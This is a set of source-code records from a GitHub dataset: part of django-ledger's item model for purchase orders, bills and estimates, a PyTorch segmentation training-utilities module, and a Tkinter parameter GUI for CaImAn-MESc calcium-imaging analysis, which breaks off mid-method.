Model: {self.po_model_id} | {po_status_display} | {self.po_total_amount}'\n elif self.bill_model_id:\n return f'Bill Model: {self.bill_model_id} | {self.total_amount}'\n elif self.invoice_model_id:\n return f'Invoice Model: {self.invoice_model_id} | {self.total_amount}'\n elif self.ce_model_id:\n return f'Estimate/Contract Model: {self.ce_model_id} | {self.ce_cost_estimate}'\n return f'Orphan {self.__class__.__name__}: {self.uuid}'\n\n def is_received(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is received.\n ItemModel status is only relevant for ItemModels associated with PurchaseOrderModels.\n\n Returns\n -------\n bool\n True if received, else False.\n \"\"\"\n return self.po_item_status == self.STATUS_RECEIVED\n\n def is_ordered(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is ordered.\n ItemModel status is only relevant for ItemModels associated with PurchaseOrderModels.\n\n Returns\n -------\n bool\n True if received, else False.\n \"\"\"\n return self.po_item_status == self.STATUS_RECEIVED\n\n def is_canceled(self):\n \"\"\"\n Determines if the ItemModel instance is canceled.\n ItemModel status is only relevant for ItemModels associated with PurchaseOrderModels.\n\n Returns\n -------\n bool\n True if canceled, else False.\n \"\"\"\n return self.po_item_status == self.STATUS_CANCELED\n\n # ItemTransactionModel Associations...\n def has_estimate(self) -> bool:\n \"\"\"\n Determines if the 
ItemModel instance is associated with an EstimateModel.\n\n Returns\n -------\n bool\n True if associated with an EstimateModel, else False.\n \"\"\"\n return self.ce_model_id is not None\n\n def has_po(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is associated with a PurchaseOrderModel.\n\n Returns\n -------\n bool\n True if associated with an PurchaseOrderModel, else False.\n \"\"\"\n return self.po_model_id is not None\n\n def has_invoice(self):\n \"\"\"\n Determines if the ItemModel instance is associated with a InvoiceModel.\n\n Returns\n -------\n bool\n True if associated with an InvoiceModel, else False.\n \"\"\"\n return self.invoice_model_id is not None\n\n def has_bill(self):\n \"\"\"\n Determines if the ItemModel instance is associated with a BillModel.\n\n Returns\n -------\n bool\n True if associated with an BillModel, else False.\n \"\"\"\n return self.bill_model_id is not None\n\n # TRANSACTIONS...\n def update_total_amount(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance fields according to its associations.\n Calculates and updates total_amount accordingly. Called on every clean() call.\n \"\"\"\n if any([\n self.has_bill(),\n self.has_invoice(),\n self.has_po()\n ]):\n if self.quantity is None:\n self.quantity = 0.0\n\n if self.unit_cost is None:\n self.unit_cost = 0.0\n\n self.total_amount = round(Decimal.from_float(self.quantity * self.unit_cost), self.DECIMAL_PLACES)\n\n if self.has_po():\n\n if self.quantity > self.po_quantity:\n raise ValidationError(f'Billed quantity {self.quantity} cannot be greater than '\n f'PO quantity {self.po_quantity}')\n if self.total_amount > self.po_total_amount:\n raise ValidationError(f'Item amount {self.total_amount} cannot exceed authorized '\n f'PO amount {self.po_total_amount}')\n\n if self.total_amount > self.po_total_amount:\n # checks if difference is within tolerance...\n diff = self.total_amount - self.po_total_amount\n if diff > DJANGO_LEDGER_TRANSACTION_MAX_TOLERANCE:\n raise ValidationError(\n f'Difference between PO Amount {self.po_total_amount} and Bill {self.total_amount} '\n f'exceeds tolerance of {DJANGO_LEDGER_TRANSACTION_MAX_TOLERANCE}')\n self.total_amount = self.po_total_amount\n return\n\n # PURCHASE ORDER...\n def update_po_total_amount(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance purchase order fields according to its associations.\n Calculates and updates po_total_amount accordingly. Called on every clean() call.\n \"\"\"\n if self.has_po():\n if self.po_quantity is None:\n self.po_quantity = 0.0\n if self.po_unit_cost is None:\n self.po_unit_cost = 0.0\n\n self.po_total_amount = round(Decimal.from_float(self.po_quantity * self.po_unit_cost), self.DECIMAL_PLACES)\n\n # ESTIMATE/CONTRACTS...\n def update_cost_estimate(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance cost estimate fields according to its associations.\n Calculates and updates ce_cost_estimate accordingly. Called on every clean() call.\n \"\"\"\n if self.has_estimate():\n if self.ce_quantity is None:\n self.ce_quantity = 0.00\n if self.ce_unit_cost_estimate is None:\n self.ce_unit_cost_estimate = 0.00\n self.ce_cost_estimate = round(Decimal.from_float(self.ce_quantity * self.ce_unit_cost_estimate),\n self.DECIMAL_PLACES)\n\n def update_revenue_estimate(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance revenue estimate fields according to its associations.\n Calculates and updates ce_revenue_estimate accordingly. 
Called on every clean() call.\n \"\"\"\n if self.has_estimate():\n if self.ce_quantity is None:\n self.ce_quantity = 0.00\n if self.ce_unit_revenue_estimate is None:\n self.ce_unit_revenue_estimate = 0.00\n self.ce_revenue_estimate = Decimal.from_float(self.ce_quantity * self.ce_unit_revenue_estimate)\n\n # HTML TAGS...\n def html_id(self) -> str:\n \"\"\"\n Unique ItemModel instance HTML ID.\n\n Returns\n _______\n str\n HTML ID as a String.\n \"\"\"\n return f'djl-item-{self.uuid}'\n\n def html_id_unit_cost(self) -> str:\n \"\"\"\n Unique ItemModel instance unit cost field HTML ID.\n\n Returns\n _______\n str\n HTML ID as a String.\n \"\"\"\n return f'djl-item-unit-cost-id-{self.uuid}'\n\n def html_id_quantity(self) -> str:\n \"\"\"\n Unique ItemModel instance quantity field HTML ID.\n\n Returns\n _______\n str\n HTML ID as a String.\n \"\"\"\n return f'djl-item-quantity-id-{self.uuid}'\n\n def can_create_bill(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance can be associated with a BillModel.\n Returns\n -------\n bool\n True, if instance can be associated with a BillModel, else False.\n \"\"\"\n return self.bill_model_id is None and self.po_item_status in [\n self.STATUS_ORDERED,\n self.STATUS_IN_TRANSIT,\n self.STATUS_RECEIVED\n ]\n\n def get_status_css_class(self) -> str:\n \"\"\"\n Determines the CSS Class used to represent the ItemModel instance in the UI based on its status.\n\n Returns\n -------\n str\n The CSS class as a String.\n \"\"\"\n if self.is_received():\n return ' is-success'\n elif self.is_canceled():\n return ' is-danger'\n elif self.is_ordered():\n return ' is-info'\n return ' is-warning'\n\n def clean(self):\n if self.has_po() and not self.po_item_status:\n self.po_item_status = self.STATUS_NOT_ORDERED\n\n self.update_po_total_amount()\n self.update_cost_estimate()\n self.update_revenue_estimate()\n self.update_total_amount()\n\n\n# FINAL MODEL CLASSES....\n\nclass UnitOfMeasureModel(UnitOfMeasureModelAbstract):\n \"\"\"\n Base UnitOfMeasureModel from Abstract.\n \"\"\"\n\n\nclass ItemTransactionModel(ItemTransactionModelAbstract):\n \"\"\"\n Base ItemTransactionModel from Abstract.\n \"\"\"\n\n\nclass ItemModel(ItemModelAbstract):\n \"\"\"\n Base ItemModel from Abstract.\n \"\"\"\n","repo_name":"arrobalytics/django-ledger","sub_path":"django_ledger/models/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":53422,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"40"} +{"seq_id":"41475346219","text":"# -*- coding: utf-8 -*-\n# Time : 2020/7/15 13:32\n# Author : zlich\n# Filename: train_utils.py\nimport torch\nimport torch.nn as nn\nimport os\nimport numpy as np\n# from utils.print_utils import *\nfrom utils.log_utils import infoLogger\nfrom utils.metrics import AverageMeter, Evaluator\nimport time\nimport yaml\nimport os\nfrom .print_utils import print_info_message\n\n\ndef deviceSetting(logger=None, device=None):\n if not device:\n pass\n else:\n os.environ['CUDA_VISIBLE_DEVICES'] = device\n num_gpus = torch.cuda.device_count()\n device = 'cuda' if num_gpus > 0 else 'cpu'\n if num_gpus >= 1:\n if logger:\n logger.info(\"GPU found, device: {}, number: {}.\".format(device, num_gpus))\n else:\n print_info_message(\"GPU found, device: {}, number: {}.\".format(device, num_gpus))\n else:\n if logger:\n logger.warning(\"No GPU found, device: CPU.\")\n else:\n print_info_message(\"No GPU found, device: CPU.\")\n # print_warning_message()\n return num_gpus, torch.device(device)\n\n\ndef 
savePath(args):\n saveDir = args.logdir\n saveDir = os.path.abspath(saveDir)\n childPath = '{}_{}'.format(args.model, time.strftime(\"%Y%m%d-%H%M%S\"))\n if not args.logdir:\n saveDir = os.path.join('../checkpoints', childPath)\n else:\n saveDir = os.path.join(saveDir, childPath)\n\n os.makedirs(saveDir, exist_ok=True)\n\n return saveDir\n\n\ndef readYAML(path):\n if os.path.isfile(path):\n with open(path, 'r', encoding='utf-8') as fs:\n fs = fs.read()\n config = yaml.load(fs)\n return config\n else:\n return None\n\n\ndef modelDeploy(args, model, optimizer, scheduler, logger):\n if args.num_gpus >= 1:\n from torch.nn.parallel import DataParallel\n model = DataParallel(model)\n model = model.cuda()\n\n if torch.backends.cudnn.is_available():\n import torch.backends.cudnn as cudnn\n cudnn.benchmark = True\n cudnn.deterministic = True\n\n trainData = {'epoch': 0,\n 'loss': [],\n 'miou': [],\n 'val': [],\n 'bestMiou': 0\n }\n\n if args.resume:\n if os.path.isfile(args.resume):\n logger.info(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location=torch.device('cpu'))\n\n # model&optimizer\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n # stop point\n trainData = checkpoint['trainData']\n for i in range(trainData['epoch']):\n scheduler.step()\n # print(trainData)\n\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, trainData['epoch']))\n\n else:\n logger.error(\"=> no checkpoint found at '{}'\".format(args.resume))\n assert False, \"=> no checkpoint found at '{}'\".format(args.resume)\n\n if args.finetune:\n if os.path.isfile(args.finetune):\n logger.info(\"=> finetuning checkpoint '{}'\".format(args.finetune))\n state_all = torch.load(args.finetune, map_location='cpu')['model']\n state_clip = {} # only use backbone parameters\n # print(model.state_dict().keys())\n for k, v in state_all.items():\n state_clip[k] = v\n # print(state_clip.keys())\n model.load_state_dict(state_clip, strict=False)\n else:\n logger.warning(\"finetune is not a file.\")\n pass\n\n if args.freeze_bn:\n logger.warning('Freezing batch normalization layers')\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n return model, trainData\n\n\ndef train_seg(model, dataLoader, epoch, optimizer, loss_fn, num_classes,\n logger, tensorLogger, device='cuda', args=None):\n model.train()\n logger.info(\"Train | [{:2d}/{}] | Lr: {} |\".format(epoch + 1, args.max_epoch, optimizer.param_groups[0][\"lr\"]))\n tensorLogger.add_scalar(\"Common/lr\", optimizer.param_groups[0][\"lr\"], epoch)\n losses = AverageMeter()\n batch_time = AverageMeter()\n Miou = AverageMeter()\n\n evaluator = Evaluator(num_class=num_classes)\n evaluator.reset()\n\n lossList = []\n miouList = []\n for i, (inputs, target) in enumerate(dataLoader):\n inputs = inputs.to(device=device)\n target = target.to(device=device)\n\n initTime = time.time()\n output = model(inputs)\n\n loss = loss_fn(output, target)\n\n output_np = output.detach().cpu().numpy()\n target_np = target.detach().cpu().numpy()\n\n # print(output_np.shape, target_np.shape)\n evaluator.add_batch(target_np, np.argmax(output_np, axis=1))\n losses.update(loss.item(), inputs.size(0))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n batch_time.update(time.time() - initTime)\n if i % 20 == 0:\n miou, iou = evaluator.Mean_Intersection_over_Union()\n Miou.update(miou, 20)\n 
tensorLogger.add_scalar('train/loss', losses.avg, epoch * len(dataLoader) + i)\n tensorLogger.add_scalar('train/miou', miou, epoch * len(dataLoader) + i)\n lossList.append(losses.avg)\n miouList.append(miou)\n\n if i % 100 == 0: # print after every 100 batches\n logger.info(\"Train | {:2d} | [{:4d}/{}] Infer:{:.2f}sec | Loss:{:.4f} | Miou:{:4f} |\".\n format(epoch + 1, i + 1, len(dataLoader), batch_time.avg, losses.avg, miou))\n evaluator.reset()\n\n return lossList, miouList\n\n\ndef val_seg(model, dataLoader, epoch, loss_fn, num_classes, logger, tensorLogger, device='cuda', args=None):\n model.eval()\n logger.info(\"Valid | [{:2d}/{}]\".format(epoch + 1, args.max_epoch))\n losses = AverageMeter()\n batch_time = AverageMeter()\n\n evaluator = Evaluator(num_class=num_classes)\n evaluator.reset()\n with torch.no_grad():\n for i, (inputs, target) in enumerate(dataLoader):\n inputs = inputs.to(device=device)\n target = target.to(device=device)\n\n initTime = time.time()\n output = model(inputs)\n\n loss = loss_fn(output, target)\n\n output_np = output.detach().cpu().numpy()\n target_np = target.detach().cpu().numpy()\n\n # print(output_np.shape, target_np.shape)\n evaluator.add_batch(target_np, np.argmax(output_np, axis=1))\n losses.update(loss.item(), inputs.size(0))\n\n batch_time.update(time.time() - initTime)\n\n if i % 100 == 0: # print after every 100 batches\n logger.info(\"Valid | {:2d} | [{:4d}/{}] Infer:{:.2f}sec | Loss:{:.4f} | Miou:{:4f} |\".\n format(epoch + 1, i + 1, len(dataLoader), batch_time.avg, losses.avg,\n evaluator.Mean_Intersection_over_Union()[0]))\n Totalmiou = evaluator.Mean_Intersection_over_Union()[0]\n tensorLogger.add_scalar('val/loss', losses.avg, epoch + 1)\n tensorLogger.add_scalar('val/miou', Totalmiou, epoch + 1)\n\n return losses.avg, Totalmiou\n\n\ndef save_checkpoint(state, is_best, dir, extra_info='model', epoch=-1, miou_val=0, logger=None):\n check_pt_file = dir + os.sep + str(extra_info) + '_checkpoint_{}_{:6f}.pth.tar'.format(\n state['trainData']['epoch'] + 1,\n miou_val)\n torch.save(state, check_pt_file)\n if is_best:\n torch.save(state['model'],\n dir + os.sep + str(extra_info) + '_best_{}_{:6f}.pth'.format(state['trainData']['epoch'] + 1,\n miou_val))\n if epoch != -1:\n torch.save(state['model'], dir + os.sep + str(extra_info) + '_ep_' + str(epoch) + '.pth')\n if logger:\n logger.info('Train | {:2d} | Checkpoint: {}'.format(state['trainData']['epoch'] + 1, check_pt_file))\n else:\n print_info_message('Train | {:2d} | Checkpoint: {}'.format(state['trainData']['epoch'] + 1, check_pt_file))\n\n\nif __name__ == '__main__':\n logger = infoLogger(name=\"test\")\n deviceSetting(logger)\n\n config = readYAML(\"../config/bdd100k_deeplabv3p_mobilenetv2_apex.yaml\")\n print(config)\n","repo_name":"hezl1592/PytorchProjectTemplate","sub_path":"utils/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11095715610","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom collections import OrderedDict\r\nfrom tkscrolledframe import ScrolledFrame\r\nimport json\r\nimport re\r\nimport os.path\r\n\r\nclass GUI():\r\n\r\n # Define settings upon initialization. 
Here you can specify\r\n def __init__(self, master=None, nogui=False):\r\n self.params = {\r\n \"files\": {\r\n \"name\": \"MESc input files\",\r\n \"type\": \"filelist\",\r\n \"default_value\": [],\r\n \"description\": \"\",\r\n },\r\n \"decay_time\": {\r\n \"name\": \"Decay Time\",\r\n \"type\": float,\r\n \"default_value\": 0.4,\r\n \"description\": \"Length of a typical transient in seconds. decay_time is an approximation of the time scale over which to expect a significant shift in the calcium signal during a transient. It defaults to 0.4, which is appropriate for fast indicators (GCaMP6f), slow indicators might use 1 or even more. However, decay_time does not have to precisely fit the data, approximations are enough.\",\r\n },\r\n \"gSig\": {\r\n \"name\": \"Half-Size of Neurons\",\r\n \"type\": \"pair\",\r\n \"default_value\": [6, 6],\r\n \"description\": \"Expected half-size of neurons in pixels [rows X columns]. CRUCIAL parameter for proper component detection.\",\r\n },\r\n \"p\": {\r\n \"name\": \"Order of AR Indicator Dynamics\",\r\n \"type\": int,\r\n \"default_value\": 2,\r\n \"description\": \"Order of the autoregressive model. p = 0 turns deconvolution off. If transients in your data rise instantaneously, set p = 1 (occurs at low sample rate or slow indicator). If transients have visible rise time, set p = 2. If the wrong order is chosen, spikes are extracted unreliably.\",\r\n },\r\n \"ds_factor\": {\r\n \"name\": \"Spatial Downsampling Factor\",\r\n \"type\": int,\r\n \"default_value\": 1,\r\n \"description\": \"Spatial downsampling factor (increases speed but may lose some fine structure).\",\r\n },\r\n \"gnb\": {\r\n \"name\": \"Number of Background Components\",\r\n \"type\": int,\r\n \"default_value\": 2,\r\n \"description\": \"Number of global background components. This is a measure of the complexity of your background noise. Defaults to nb = 2, assuming a relatively homogeneous background. nb = 3 might fit for more complex noise, nb = 1 is usually too low. If nb is set too low, extracted traces appear too noisy, if nb is set too high, neuronal signal starts getting absorbed into the background reduction, resulting in reduced transients.\",\r\n },\r\n \"online_MC\": {\r\n \"name\": \"Enable Online Motion Correction\",\r\n \"type\": bool,\r\n \"default_value\": True,\r\n \"description\": \"Flag for online motion correction.\",\r\n },\r\n \"pw_rigid\": {\r\n \"name\": \"Enable PW-Rigid Motion Correction\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"Flag for pw-rigid motion correction (slower but potentially more accurate).\",\r\n },\r\n \"max_shifts_online\": {\r\n \"name\": \"Maximum Shift\",\r\n \"type\": int,\r\n \"default_value\": 60,\r\n \"description\": \"Maximum shifts for motion correction during online processing.\",\r\n },\r\n \"thresh_CNN_noisy\": {\r\n \"name\": \"Online CNN Threshold\",\r\n \"type\": float,\r\n \"default_value\": 0.7,\r\n \"description\": \"Threshold for the online CNN classifier. Greater thresholds find better components but may not find as many components. Set to 0.5 for higher recall values, but at the expense of lower precision. Set to 0.7 for higher precision values, but at the expense of lower recall.\",\r\n },\r\n \"min_SNR\": {\r\n \"name\": \"Min Signal-Noise-Ratio (SNR)\",\r\n \"type\": float,\r\n \"default_value\": 1.5,\r\n \"description\": \"Minimum SNR Threshold for detecting new components. Peak SNR is calculated from strong calcium transients and the noise estimate. 
Set to 1.0 for higher recall values, but at the expense of lower precision. Set to 1.5 for higher precision values, but at the expense of lower recall.\",\r\n },\r\n \"min_num_trial\": {\r\n \"name\": \"Min Number of Candidates\",\r\n \"type\": int,\r\n \"default_value\": 5,\r\n \"description\": \"Number of candidate components to be considered at each timestep. Set to 10 for higher recall values, but at the expense of lower precision. Set to 5 for higher precision values, but at the expense of lower recall.\",\r\n },\r\n \"epochs\": {\r\n \"name\": \"Epochs\",\r\n \"type\": int,\r\n \"default_value\": 1,\r\n \"description\": \"Number of passes over the data. This increases the time per MUnit but is beneficial for finding more components, especially in the strict regime or high acceptance thresholds.\",\r\n },\r\n \"rval_thr\": {\r\n \"name\": \"Spatial Footprint Consistency\",\r\n \"type\": float,\r\n \"default_value\": 0.8,\r\n \"description\": \"The spatial footprint of the component is compared with the frames where this component is active. Other component’s signals are subtracted from these frames, and the resulting raw data is correlated against the spatial component. This ensures that the raw data at the spatial footprint aligns with the extracted trace.\",\r\n },\r\n \"init_batch\": {\r\n \"name\": \"Frames for Initialization\",\r\n \"type\": int,\r\n \"default_value\": 100,\r\n \"description\": \"Number of frames for initialization.\",\r\n },\r\n \"K\": {\r\n \"name\": \"Initial Number of Components\",\r\n \"type\": int,\r\n \"default_value\": 5,\r\n \"description\": \"Initial number of components.\",\r\n },\r\n \"layer_names\": {\r\n \"name\": \"Which layers to process\",\r\n \"type\": str,\r\n \"default_value\": \"*\",\r\n \"description\": \"Which layers to process from MESc files. If set to a comma-separated list of (one-based) layer indices, then only those layers will be processed. If set to the special value '*', every layer is processed.\",\r\n },\r\n \"compute_mean_images\": {\r\n \"name\": \"Save mean images\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"If set, then the CaImAn-MESc module will compute the average of all frames for each layer before processing that layer and save them in the output folder.\",\r\n },\r\n \"show_plots\": {\r\n \"name\": \"Show CaImAn-MESc plots\",\r\n \"type\": bool,\r\n \"default_value\": True,\r\n \"description\": \"If set, then the CaImAn MESc module will visualize the partial results during the OnACID. Currently, two plots are shown: a plot with the ROI contours overlaid on the current frame, and a plot showing the activity of each component.\",\r\n },\r\n \"contour_plot_scale\": {\r\n \"name\": \"Contour plot rescale factor\",\r\n \"type\": float,\r\n \"default_value\": 1.0,\r\n \"description\": \"The contour plot window is rescaled by this factor.\",\r\n },\r\n \"export_centers\": {\r\n \"name\": \"Put ROI centers on clipboard\",\r\n \"type\": bool,\r\n \"default_value\": True,\r\n \"description\": \"If set, then the CaImAn MESc module will put the current ROI centers on the clipboard every 100 frames during OnACID. The format is consistent with the one used by MESc.\",\r\n },\r\n \"save_results\": {\r\n \"name\": \"Save OnACID results\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"If set, then the OnACID results will be dumped as a separate .hdf5 file for each layer. 
The HDF5 structure is CaImAn's own, and is based on the fields of the OnACID Python object.\",\r\n },\r\n \"save_mescroi\": {\r\n \"name\": \"Save contours as .mescroi\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"If set, then the contours of the ROIs will be saved as a separate .mescroi file for each layer so they can be imported into the MESc GUI.\",\r\n },\r\n \"length_override\": {\r\n \"name\": \"Max number of real-time frames\",\r\n \"type\": int,\r\n \"default_value\": 1000,\r\n \"description\": \"CaImAn needs the total number of frames in advance to preallocate its arrays. When processing real-time data, this is not available, so we pass an upper estimate to CaImAn, and after the run, we truncate the arrays to the actual movie length. Has no effect when not running in real time.\",\r\n },\r\n \"real_time_save_dir\": {\r\n \"name\": \"Results folder for real-time data\",\r\n \"type\": \"dir\",\r\n \"default_value\": \"\",\r\n \"description\": \"When working from a file, all results are saved into the same directory as the input. When using real-time data, the the \\\"input file\\\" is just a quasi-path provided by the MESc GUI, so results will be saved into this directory instead. Has no effect when not running in real time.\",\r\n },\r\n \"activity_plot_rows\": {\r\n \"name\": \"Activity plot rows\",\r\n \"type\": int,\r\n \"default_value\": 5,\r\n \"description\": \"Number of rows for the CaImAn-MESc activity plot.\",\r\n },\r\n \"activity_plot_cols\": {\r\n \"name\": \"Activity plot columns\",\r\n \"type\": int,\r\n \"default_value\": 8,\r\n \"description\": \"Number of columns for the CaImAn-MESc activity plot.\",\r\n },\r\n \r\n # NOTE: these are commented out because they don't correspond to any CaImAn parameter\r\n #\"component_area_thr\": {\r\n #\"name\": \"Component Area Threshold\",\r\n #\"type\": int,\r\n #\"default_value\": 100,\r\n #\"description\": \"Sets the minimum area threshold (in pixels) in which components (ROIS) much be larger than to be accepted.\",\r\n #},\r\n #\"generate_dff\": {\r\n #\"name\": \"Generate DFF traces\",\r\n #\"type\": bool,\r\n #\"default_value\": True,\r\n #\"description\": \"\",\r\n #},\r\n }\r\n \r\n self.sections = [\r\n {\r\n \"label\": \"Please select MESc file(s):\",\r\n \"params\": [\"files\"],\r\n },\r\n {\r\n \"label\": \"DATA PARAMETERS\",\r\n \"params\": [\"decay_time\", \"gSig\", \"p\", \"ds_factor\", \"gnb\"],\r\n },\r\n {\r\n \"label\": \"MOTION CORRECTION\",\r\n \"params\": [\"online_MC\", \"pw_rigid\", \"max_shifts_online\"],\r\n },\r\n {\r\n \"label\": \"ALGORITHM PARAMETERS\",\r\n \"params\": [\"thresh_CNN_noisy\", \"min_SNR\", \"min_num_trial\", \"epochs\", \"rval_thr\", \"init_batch\", \"K\"],\r\n },\r\n {\r\n \"label\": \"MESC-SPECIFIC PARAMETERS\",\r\n \"params\": [\"layer_names\", \"compute_mean_images\", \"show_plots\", \"contour_plot_scale\", \"export_centers\", \"save_results\", \"save_mescroi\", \"length_override\", \"real_time_save_dir\", \"activity_plot_rows\", \"activity_plot_cols\"],\r\n },\r\n \r\n # NOTE: these are commented out because they don't correspond to any CaImAn parameter\r\n #{\r\n #\"label\": \"EVALUATION PARAMETERS\",\r\n #\"params\": [\"component_area_thr\", \"generate_dff\"],\r\n #},\r\n ]\r\n \r\n # a small self-check to ensure that params added in the future are also added to a section\r\n for param in self.params:\r\n found = False\r\n for section in self.sections:\r\n if param in section[\"params\"]:\r\n found = True\r\n \r\n if not found:\r\n raise 
RuntimeError(\"The MESc GUI param '\" + param + \"' was specified but not added to any of the sections!\")\r\n \r\n self.values = {}\r\n for param in self.params:\r\n self.values[param] = self.params[param][\"default_value\"]\r\n \r\n self.load_params()\r\n \r\n # we have the param values set up from the json and/or the defaults; if the program was started with the \"nogui\" option, then we are done\r\n if nogui:\r\n return\r\n\r\n self.init_window()\r\n self.build_gui()\r\n self.set_field_values()\r\n\r\n # bring window to the front\r\n self.root.lift()\r\n self.root.attributes('-topmost', True)\r\n self.root.after_idle(self.root.attributes, '-topmost', False)\r\n\r\n self.root.mainloop()\r\n \r\n # Creation of init_window\r\n def init_window(self):\r\n self.root = Tk()\r\n self.root.title(\"MESc OnACID\")\r\n self.root.geometry(\"650x950\")\r\n\r\n # Create a ScrolledFrame widget\r\n sf = ScrolledFrame(self.root)\r\n sf.pack(side=\"top\", expand=1, fill=\"both\")\r\n\r\n # Bind the arrow keys and scroll wheel\r\n sf.bind_arrow_keys(self.root)\r\n sf.bind_scroll_wheel(self.root)\r\n\r\n # Create a frame within the ScrolledFrame\r\n self.inner_frame = sf.display_widget(Frame)\r\n\r\n def build_gui(self):\r\n self.gui_elements = []\r\n self.input_variables = {}\r\n \r\n current_row = 0\r\n for section in self.sections:\r\n label = Label(self.inner_frame, text = section[\"label\"], font = 'BOLD')\r\n label.grid(column = 0, row = current_row)\r\n self.gui_elements.append(label)\r\n \r\n current_row += 1\r\n \r\n for param in section[\"params\"]:\r\n if self.params[param][\"type\"] == \"filelist\":\r\n self.input_variables[param] = []\r\n \r\n file_count = len(self.values[param])\r\n for index in range(0, file_count):\r\n input_variable = StringVar()\r\n self.input_variables[param].append(input_variable)\r\n \r\n input_field = Entry(self.inner_frame, width = 50, textvariable = input_variable)\r\n input_field.grid(column = 1, row = current_row, columnspan = 2)\r\n self.gui_elements.append(input_field)\r\n \r\n browse_button = Button(self.inner_frame, text = \"...\", command = lambda param=param, index=index: self.open_file_browser(param, index))\r\n browse_button.grid(column = 3, row = current_row)\r\n self.gui_elements.append(browse_button)\r\n \r\n current_row += 1\r\n \r\n add_file_button = Button(self.inner_frame, text = \"+\", command = lambda param=param: self.add_file_input(param))\r\n add_file_button.grid(column = 2, row = current_row, sticky = E)\r\n self.gui_elements.append(add_file_button)\r\n \r\n remove_file_button = Button(self.inner_frame, text = \"-\", command = lambda param=param: self.remove_file_input(param))\r\n remove_file_button.grid(column = 3, row = current_row, sticky = W)\r\n self.gui_elements.append(remove_file_button)\r\n \r\n current_row += 1\r\n elif self.params[param][\"type\"] == \"dir\":\r\n label = Label(self.inner_frame, text = (self.params[param][\"name\"] + \": \"))\r\n label.grid(column = 1, row = current_row, sticky = E)\r\n self.gui_elements.append(label)\r\n \r\n input_variable = StringVar()\r\n self.input_variables[param] = input_variable\r\n \r\n input_field = Entry(self.inner_frame, width = 20, textvariable = input_variable)\r\n input_field.grid(column = 2, row = current_row, sticky = W)\r\n self.gui_elements.append(input_field)\r\n \r\n browse_button = Button(self.inner_frame, text = \"...\", command = lambda param=param: self.open_directory_chooser(param))\r\n browse_button.grid(column = 3, row = current_row)\r\n 
self.gui_elements.append(browse_button)\r\n \r\n current_row += 1\r\n else:\r\n label = Label(self.inner_frame, text = (self.params[param][\"name\"] + \": \"))\r\n label.grid(column = 1, row = current_row, sticky = E)\r\n self.gui_elements.append(label)\r\n \r\n if self.params[param][\"type\"] == int:\r\n input_variable = IntVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n elif self.params[param][\"type\"] == float:\r\n input_variable = DoubleVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n elif self.params[param][\"type\"] == bool:\r\n input_variable = BooleanVar()\r\n input_field = Checkbutton(self.inner_frame, variable = input_variable)\r\n elif self.params[param][\"type\"] == str:\r\n input_variable = StringVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n elif self.params[param][\"type\"] == \"pair\":\r\n input_variable = StringVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n else:\r\n raise RuntimeError(\"Unknown param type\")\r\n \r\n self.input_variables[param] = input_variable\r\n input_field.grid(column = 2, row = current_row, sticky = W)\r\n self.gui_elements.append(input_field)\r\n \r\n info_button = Button(self.inner_frame, text = \"?\", command = lambda param=param: self.show_param_description(param))\r\n info_button.grid(column = 3, row = current_row)\r\n self.gui_elements.append(info_button)\r\n \r\n current_row += 1\r\n \r\n run_button = Button(self.inner_frame, text=\"RUN PROGRAM\", font=(\"Helvetica\", 12), command = self.run_program, height = 2, width = 15, bg = \"gray64\")\r\n run_button.grid(column = 2, row = current_row, sticky = W)\r\n self.gui_elements.append(run_button)\r\n \r\n current_row += 1\r\n \r\n def clear_gui(self):\r\n for gui_element in self.gui_elements:\r\n gui_element.destroy()\r\n \r\n self.gui_elements = []\r\n self.input_variables = []\r\n \r\n def get_field_values(self):\r\n for param in self.params:\r\n param_value = None\r\n \r\n if self.params[param][\"type\"] == \"filelist\":\r\n param_value = []\r\n for input_variable in self.input_variables[param]:\r\n param_value.append(input_variable.get())\r\n else:\r\n input_field_value = self.input_variables[param].get()\r\n \r\n if self.params[param][\"type\"] == int:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == float:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == bool:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == str:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == \"pair\":\r\n result = re.match(\"\\\\[(\\\\d+)\\\\s*,\\\\s*(\\\\d+)\\\\]\", input_field_value)\r\n if result:\r\n param_value = [int(result.group(1)), int(result.group(2))]\r\n else:\r\n raise RuntimeError(\"Invalid value entered for param \" + param)\r\n elif self.params[param][\"type\"] == \"dir\":\r\n param_value = input_field_value\r\n else:\r\n raise RuntimeError(\"Unknown parameter type\")\r\n \r\n self.values[param] = param_value\r\n \r\n def set_field_values(self):\r\n for param in self.params:\r\n param_value = self.values[param]\r\n \r\n if 